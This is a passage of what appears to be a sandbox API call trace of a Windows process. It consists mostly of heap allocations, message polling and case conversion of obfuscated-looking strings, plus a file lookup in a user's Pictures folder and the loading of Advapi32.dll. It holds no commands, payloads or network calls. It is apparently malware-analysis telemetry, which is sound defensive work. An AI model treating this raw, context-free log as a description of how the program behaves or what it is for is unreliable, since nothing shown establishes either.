cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.555] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.555] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0254.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.556] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/70BY_GgaY1.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3db00, ftCreationTime.dwHighDateTime=0x1d4ca4a, ftLastAccessTime.dwLowDateTime=0xe8dbd680, ftLastAccessTime.dwHighDateTime=0x1d4cd31, ftLastWriteTime.dwLowDateTime=0xe8dbd680, ftLastWriteTime.dwHighDateTime=0x1d4cd31, nFileSizeHigh=0x0, nFileSizeLow=0x4c04, dwReserved0=0x98c0047, dwReserved1=0x1c6fa, cFileName="70BY_GgaY1.bmp", cAlternateFileName="70BY_G~1.BMP")) returned 0xaa57a0 [0254.556] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.557] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0254.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.560] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.561] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.562] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.562] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.562] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.562] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.563] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.563] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.563] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.565] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.566] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.567] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.567] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.567] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0254.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.568] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.569] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: 